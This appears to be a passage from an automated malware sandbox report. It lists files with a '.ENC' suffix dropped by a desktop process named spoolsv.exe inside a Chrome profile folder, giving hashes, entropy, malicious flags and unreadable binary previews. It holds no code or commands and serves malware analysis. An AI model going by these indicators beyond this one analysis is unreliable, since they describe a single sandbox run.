                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):36880
                                                                                                                                                                                                                                                      Entropy (8bit):7.99549409701384
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:768:NpzpOmy2H79VdCDaghrhk9i/dKtyLlZ4THVr3JOIfXWtIRzaNQfAMFmoMsIW:NppOJ2H79XCD3ldKtyLLgjyCaAV8y
                                                                                                                                                                                                                                                      MD5:81FEF86015DC5EF520079033846B66B4
                                                                                                                                                                                                                                                      SHA1:FE0A5CEC9D155FA0CB0ED4E55B097F13E3FB252D
                                                                                                                                                                                                                                                      SHA-256:2AE4BFFC11DE988FE752BED473F8C288ABD230F30FF620660D458AD173899B97
                                                                                                                                                                                                                                                      SHA-512:43C850DDDA26AFF4000F5641A605D311D1D2BF1CA8848F46EAEC3F97BA1B0DF4FA47CCC60FD020321874F3CF27AA2CCC9066A768DA1CA8FB672CD87E129C5F3D
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:rS7n2.*...........i..p...%.......-.<.0.G~.R..G].wBr....l.....A...)u.....:v.....Q...n]B....8.@..Ot)...t.=...r...&,lj......Jb<!.j=.i.U..Y..80.HV^.....]..._.6W.\.}[.8....%...".....:.1L..Y9.5..g.....S.FW.>.=....<r...^.-.[F.!....m.|.=\(d}..50....~@O...x.Fg...{.:.$k[.T....@..".&jQ.1O1D...Gp.&D.~.,#..$f.b.1..;..&s...../..^..z;.{Nb..L..f...W.N..rL..%.Z...i.*....@.">.m|..9A.et.k.....x......#<....?.NK4Ij.p*.@.ou..C>&:G.5m.#8.EI~..D.._.B..;A..e..l...!!.H"......4.$h...e..E;.....c+.Q.Na..GyHG......ls..O..s^Q.?..U.&.;.M.l......ed.....m.<G.....&.m....P..Q.&.*Lq.6.../..).D....C.G....N.D....`..m.>.4.*.......P......|*.z..k\..A.T..#. !.Y!........[A..Puh.Dz..1n."Q..9.x.6./..."E...R))..|..:ur.......yKyH.E..,tR..<?...[...DL.o..x9X.9...=...x.G&.l.*.... }.{.gj.E...c..W.m.g)W|.3.Y}2.(..W..e3k.j..#./.......7O............{...n.....)..... .$.].._..{.z.$.$..P.H1..d.F......+.3...JT..l.-&.oA...k.*.y1\?.....u.o..8......S.......u.,>~+.-.&..&K...%.y....HN%*`.\.|.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):368
                                                                                                                                                                                                                                                      Entropy (8bit):7.461479466912676
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:qKzEy1VSCAXIfzMYCm8/UPleOWjbn/s/43En0IscIFM0cGvKTZG87gKQWzv:qKzEvXIDGUPl4bne4Unxsd1cGvKTZPE2
                                                                                                                                                                                                                                                      MD5:561E6AB84A3A0343638C5FE5F7B94A14
                                                                                                                                                                                                                                                      SHA1:E58A3697E49023609A206DFC64718D224002C782
                                                                                                                                                                                                                                                      SHA-256:5BF1A7CD2A3A881211A38C8D41EE72D17A44D80B51A49CC86D0FAD29F0F95427
                                                                                                                                                                                                                                                      SHA-512:8B0C3115E43B8FE27B50A02FC3E680A3B3D8EA6BCE6A6E84C03831182337DABC2B183FBBE5BC7C2E37186680ED777D9B8970295FDF994036B66F0C7AEA4F7C05
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:_X|..a..rz.&I..V....F..k.`....$#..........eVK.h>..)<.%. ....Tk.!.'/...KWO3z...Om.3.,...`..-A..=....N.MF..J&N.O.^..e....k...yp......3rz...;.B.8>.;...............!e5.{s.&.2$.....~f....&......+..L.m...J.."...].s.%.x..#..2..g;#........I4....Yk../c..S...-~q..o|...u......7/...1O....Tt...t..$..Z........3wM^...0Xt.A(...k.......^...P&.>m..4.X%.q..G..L

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Trust Tokens-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Trust Tokens.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):36880
                                                                                                                                                                                                                                                      Entropy (8bit):7.995132644917758
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:768:N4nD5KdnKnJKjq99n9SwsPdgHb4z8sCVF8ZtEwZWJ5o29wuBAuNAiCx2Jk6:NYDkEJK+9I84osCVF8L/ZWs25wB6
                                                                                                                                                                                                                                                      MD5:FF5D98D198436C565A9638EE6E202B99
                                                                                                                                                                                                                                                      SHA1:97381B7E399B55A07B8CDC23F2EBC6C76BCBC66A
                                                                                                                                                                                                                                                      SHA-256:CB804FC40597CB5BE4CC8EDB45AD16DD047A6E9157C0FC1D17AE2FF834782907
                                                                                                                                                                                                                                                      SHA-512:C086051FD393186353143E8B225DF4086EA918DFAB62C9FF68167C0FAF525476B6E302D9C51BA06C872A1C8C5FD692DEE54573AE2AFD51E2229E5AE1BFC55A30
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:rS7n2.*...........6{;..=n....eW0....@..^i.H.... .N..".f.s.w..U..U.....Ai....|0..C"w..V.[.s.0j.....fm#S....1.....'.v.%..........;..@..Jb.....u<."..s.t....l}.V.X.7p......]6.%4.s...kH...q....( ..u.].-...o..'g.r......_......x]....\..[..J..ha...A..J..]@....x.*.X.."4u...?.9'..p..|......C.h..$..L../.{..A...,....J....}.C..F....f....(W...2..V..u.v........F..V...p.H.k#...d.Ih"....)0h..(..I.x ...M.&.n.Q.3.6P~D.o.C..@$>.k....]...U!..P.....6.j...Tn8.d.2..F..h....bh.g.Dgf.n...(.... V.O..}..o..T.XY]...;fO.DmHHSf(2..T6..BXZH.....d]h.n.N......c.t.s..hI9q&:x...;..v!|<..... X.XM.........r.,....x...6.....uh..<..6.K..d.Z....;.d.F.kq...m{k.Y..,!&l...Gy%...z.,..z.._.1j..J.T.,......j....b.jG..~...W=p...z..........'.........c.,..E...n.....z...Q..)....7..`J..k.....j.W.......n.eA5.k.I.Ibp.\....H~....g......aW.k...E... ...^.E.......X......q..4.#.....ZY...EK.R..f(..%3|:d..'+...F.jb..y..{MN.....8.~Z.........].x..R...a.Zw(E@r..X.K.....}..W..V8...v...E..,.U....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):9344
                                                                                                                                                                                                                                                      Entropy (8bit):7.982839395091721
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:5QZB+GdNR7uaVwGJrY7UcMO/vOjouIj8HfWX/OBam/hLTEgMd2FdmiVS:gB5VK8YhMwOjozpX2BBhLsyjQ
                                                                                                                                                                                                                                                      MD5:0843F74B874F75DCDB4F36AA9DB05150
                                                                                                                                                                                                                                                      SHA1:89EBD583F20CBBBD82FE4A17A815A84B93B78D21
                                                                                                                                                                                                                                                      SHA-256:92F58371D45B5F5C5A5DBD17CF29D65C3EEED9AA46DD2D58D2A20312A578C5C5
                                                                                                                                                                                                                                                      SHA-512:0CBB581763AD0FAD592E981ABDE7FF7D8F92BFF186C126F9ADC37926EC15923D4BAFE8026F80F80CA3FF7439B14AD1157DE1C6BA2AF5CF5DC75ADBFAF3BF1445
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...l2}.d..5.s.7>.F.U.I..`...v..........|.+v@...cu......!'.M:}.1.K6..3.K m.=.?.s.a{..]..#.7b.q|.,....I>.S3 .?g....ne...X.u.d.lx.;wW..E.R..5.-Zk..U4....`x..b.N]hkO#..M....i....m".....P..[.94.....27..)..p....Y....D....D...,lV.....V....!...x..Y....{..Hz.a......]..o...v..1wa.a.QU.../)p&>`@.......g..3....%..Mo2..O.v..d.H..H.J.j"K.j......8.(...~3..........C0...9s.......pR.>.s.eV...hR.t>_4=.S.>9{p..YE:7...C...fn...t.w{u.;>.:'.i....Z.l?.E.xTF........$.!r......6..KET]....".2....:......*......*M}........>...W...V.6=P.>GO.,.(...9.4Xu..x3..u.N..,.9D.`...h`{Q...d.p.S.....ia.k...^..b....OZ..J..O.RxH...X_-..mr.......?.p..@.h9.+.~..K.....p...Cc.I.F.....a... ."z.........=.E.......5...[.a>sn.F.rT...p.wL..o.[.{fV6.Q.)M|.".O.Qf....`..1....Q.l.B.eiMH.B..j7.*..)..h.L.......ys.a..\*.*.5...<..o.0..u4dA..(.......`.PW:*.Ce......5....=....S....$.*.!...,..J.+/N.P3P_..m6....B. .;...1W..&.%.k-.,.-&,...l..n'.B.u.R..=...Hk[pv.PD{.y.k&..O.o.x...vb.RJ.......2!.;L>.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferredApps.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                                                      Entropy (8bit):5.418295834054494
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:EhWBahQaNh81Qat2s3Hzn:EkAq1Qap3Hz
                                                                                                                                                                                                                                                      MD5:ECCB317F3A8991E950E07C9655840FE9
                                                                                                                                                                                                                                                      SHA1:FF86143F289762E6C885989F9E557AE450FC2894
                                                                                                                                                                                                                                                      SHA-256:A8F67DB04FED814DB572E1FA87443EA7C0AE4FB8CCC2738594B5122507E46BAB
                                                                                                                                                                                                                                                      SHA-512:491A09C6BD5892CFD319271C5D325A66FA5896BB6A3769C68DB6870B64FC8F51A1EBB5D643E83AF308107B2A20D1F08FDF8D5FACB64817303B98D595458FDBBE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....d?......(.E.=..Pb.x..?..B..M8....P~"|.".p

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PrivateAggregation-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PrivateAggregation.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20496
                                                                                                                                                                                                                                                      Entropy (8bit):7.990740491296236
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:384:NHOYOsIVD/+J2so/yF8pTr3/CoTQEkXUeYL2TZdugRDwpc82BIPBUvWP0LGpPKDU:NalGJ2/68pT+mkEJiDu0kpaBIPBkWPnd
                                                                                                                                                                                                                                                      MD5:CE077AD7864962AD674FF258284AE753
                                                                                                                                                                                                                                                      SHA1:CDEE51621B29849A5A3692DCDDBC58A2C42CCD98
                                                                                                                                                                                                                                                      SHA-256:A3CD27AADDA88AF6E5BD750C5DDD95E00A5E2FA703382F48DC48CA9EFFCD2BE9
                                                                                                                                                                                                                                                      SHA-512:6870A7A64EC3C06494F8AE73F65B4D54DE104D627A1C6E6A7F6D22DECFEB7EEC60F53DBC54238041CF7D50D9E8FB627C544895E29FFE6CE2BDEC67AA74C30DB9
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:rS7n2.*........7..~m;..,.aK..........#......8Y...4N#.....*5......b;~...S...h!.d.....[c.z...c.}...R]...q/u......|;n.....A..9...J9..+....U.fVY...Gw.A..@..H...f..k_.].N..6.\.".7.....~...N0F.....CIG.....t(.).]%Y]..{0.....,q.X.6...Q.V..8...+et,. ..&5.0B..V.".D.......>......G.i.>A....t...M...i.K0@.....x...CO.h...io<..(..~...6.....G.*..P|...+...u;v.i..<..c...d&.)..6.GD.....M.E...6(p...sr.b"..;..$.>&.6._C.......W..s..:?xRK.P."q...wg......O.....@J......q jZL..b ..Z..[..VgXg.G..T.G...P]...@.B...lp...i..(..j...Xf....F..xF.[q..P..!.../H....O.X......4k....m..XQ.?=D.>.S.l.q..~..2........P..A,.R.JzM.....'..$gx.........;m...A0...I..n.P;C.+L.....t..R*w...b.$d...P....n.#.nvy..t....r89j!,o...T..4..X....p.........7...t.5...HBK...3N..`b.....B....=c."}.....:.^...C[..*\....P&.<-.Cs.P9%.p.]`9...7..~*]E...W...Kb.'..je.!.......T. ..-f........@.Mz^.F...-i$i....0..n..4.#.C..&f'.......}.).....w,....#.[.[<3.7.....".W. C.....V..}..........g.$6j.c...NEH....n.W.z;F..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13872
                                                                                                                                                                                                                                                      Entropy (8bit):7.986694634158083
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:/R59nSnq49kawuTj/Ay0x31eypt0zfk2UJs/+9pLWriHals+:z1Snq4IuO3j0IJsmVWriHals+
                                                                                                                                                                                                                                                      MD5:49D7B05360FD83DE4FC8962C8FDD916A
                                                                                                                                                                                                                                                      SHA1:62241D58FDC35C0DA4FFB5FD588C1F629F73F721
                                                                                                                                                                                                                                                      SHA-256:FA02A7D026E0B271D1928A4627098E5BFAEF0E7B07EC9168B62486709F6CEE75
                                                                                                                                                                                                                                                      SHA-512:F773C2C1ABD4473BD8A6E3DC669B93A6A7B4E8FA1FC2A05345ECED0DC66230F92DB8226540F86AAA03302CEEB39597256AFC15C335C308AF3527F1200EF68497
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:3.u.KIN...z.jd1W..Q.^.TH..u.E.b...+d....*,%.6..Q.y....h*..Q.."_.^p.Y..x]sl.....|.F.T....m...B..h..........p"....Ji..."".ij..S*7V.kq/.Bo.ts@4....k.A......J.b.g......L...8>......[mo...Z...p.....(...>...P...T..+.J..f.;.F.&(.j4@.RJ...w....x..A:...l..}iz...-......B1&p...<.N.[..uu....Q.x.[|..B!...f.{..Sz...He....7..D.8..../$..JD..w!...b..a..=.-.CM.........A.R.Y...%.~.t..y.;..8^...yOui..\h...F...U....~..,0.|.n._..,q,.E~...7_?^.l..{(i!M.A......X..uYf......4.... +.0..mA.p.b..B*...y..y.Z.......%....]`l.n.b&.V..^......n.M4.F>.:<&......9..I(..!...........SqY+./O.w.. jl.cw....\r/..d...;v1..i]{i....m........R....zG2:.%.{PW..,Ye...0..^i..=....Nm.zg...7`..@..q. .5.7&br.#.:..RN|... .6...-..A....X..B`1.C.O=.[=.:9.(9....../..G....A.z.....O...~Mu.4v.i.-..P..vg.B.=.5.ND{8....T....XX.E....?......{..O..s..x.2..x..{....=...\.b:.+:!.sA......w.%.....}......9..JF3..r.../...B5./....y. ...G..(d(.....ZtlZ_.r1..r..Pg.....G...,w....wG%D...B.(A..<...+....S...)*@mg........d&

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG.old.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\LOG.old.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

